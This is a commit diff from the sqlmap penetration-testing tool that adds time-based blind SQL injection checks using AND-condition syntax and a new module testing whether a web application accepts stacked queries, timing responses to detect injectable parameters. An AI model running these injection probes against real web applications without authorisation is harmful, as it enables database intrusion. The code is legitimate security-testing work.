Added support to test for stacked queries support and improved check for time based blind sql injection.

Minor bug fix in --save option
2025-12-10 09:49:06 +00:00 · 2008-12-16 21:30:24 +00:00
parent bf2a857b9a
commit 05a8c8d3bf
9 changed files with 156 additions and 23 deletions
--- a/lib/techniques/blind/timebased.py
+++ b/lib/techniques/blind/timebased.py
@@ -24,24 +24,62 @@ Franklin St, Fifth Floor, Boston, MA  02110-1301  USA



+import time
+
+from lib.core.agent import agent
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import queries
 from lib.core.settings import SECONDS
 from lib.request import inject
+from lib.request.connect import Connect as Request


 def timeTest():
    infoMsg  = "testing time based blind sql injection on parameter "
-    infoMsg += "'%s'" % kb.injParameter
+    infoMsg += "'%s' with AND condition syntax" % kb.injParameter
    logger.info(infoMsg)

-    query    = queries[kb.dbms].timedelay % SECONDS
-    timeTest = inject.goStacked(query, timeTest=True)
+    timeQuery = queries[kb.dbms].timedelay % SECONDS
+
+    query     = agent.prefixQuery(" AND %s" % timeQuery)
+    query     = agent.postfixQuery(query)
+    payload   = agent.payload(newValue=query)
+    start     = time.time()
+    _         = Request.queryPage(payload)
+    duration  = int(time.time() - start)
+
+    if duration >= SECONDS:
+        infoMsg  = "the parameter '%s' is affected by a time " % kb.injParameter
+        infoMsg += "based blind sql injection with AND condition syntax"
+        logger.info(infoMsg)
+
+        kb.timeTest = payload

-    if timeTest[0] == True:
-        kb.timeTest = timeTest[1]
    else:
-        kb.timeTest = False
+        warnMsg  = "the parameter '%s' is not affected by a time " % kb.injParameter
+        warnMsg += "based blind sql injection with AND condition syntax"
+        logger.warn(warnMsg)
+
+        infoMsg  = "testing time based blind sql injection on parameter "
+        infoMsg += "'%s' with stacked query syntax" % kb.injParameter
+        logger.info(infoMsg)
+
+        start         = time.time()
+        payload, _    = inject.goStacked(timeQuery)
+        duration      = int(time.time() - start)
+
+        if duration >= SECONDS:
+            infoMsg  = "the parameter '%s' is affected by a time " % kb.injParameter
+            infoMsg += "based blind sql injection with stacked query syntax"
+            logger.info(infoMsg)
+
+            kb.timeTest = payload
+        else:
+            warnMsg  = "the parameter '%s' is not affected by a time " % kb.injParameter
+            warnMsg += "based blind sql injection with stacked query syntax"
+            logger.warn(warnMsg)
+
+            kb.timeTest = False

    return kb.timeTest
--- a/lib/techniques/outband/init.py
+++ b/lib/techniques/outband/init.py
@@ -0,0 +1,25 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+pass
--- a/lib/techniques/outband/stacked.py
+++ b/lib/techniques/outband/stacked.py
@@ -0,0 +1,60 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+
+
+import time
+
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.data import queries
+from lib.core.settings import SECONDS
+from lib.request import inject
+
+
+def stackedTest():
+    infoMsg  = "testing stacked queries support on parameter "
+    infoMsg += "'%s'" % kb.injParameter
+    logger.info(infoMsg)
+
+    query         = queries[kb.dbms].timedelay % SECONDS
+    start         = time.time()
+    payload, _    = inject.goStacked(query)
+    duration      = int(time.time() - start)
+
+    if duration >= SECONDS:
+        infoMsg  = "the web application supports stacked queries "
+        infoMsg += "on parameter '%s'" % kb.injParameter
+        logger.info(infoMsg)
+
+        kb.stackedTest = payload
+
+    else:
+        warnMsg  = "the web application does not support stacked queries "
+        warnMsg += "on parameter '%s'" % kb.injParameter
+        logger.warn(warnMsg)
+
+        kb.stackedTest = False
+
+    return kb.stackedTest